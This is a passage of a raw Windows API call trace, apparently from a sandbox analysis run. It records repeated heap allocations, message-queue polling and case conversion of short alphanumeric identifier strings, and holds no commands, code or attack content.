wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.422] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.422] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.422] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.423] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.423] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.423] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.423] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.423] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.424] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.424] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.424] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.424] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.425] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.425] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.425] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.426] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.426] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.426] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0260.427] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.427] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0260.427] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.427] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.427] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.427] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.428] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.428] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.428] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.428] CryptDestroyKey (hKey=0xaa5960) returned 1 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.429] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.429] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.429] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.429] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.429] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.429] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.429] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.430] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.430] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.430] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.430] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.430] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.430] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.430] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.431] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.431] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.431] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.431] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.431] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.431] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.431] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.432] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.432] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0260.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.432] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.433] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.433] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.433] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.433] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.434] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.434] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.434] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.434] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.434] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.434] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 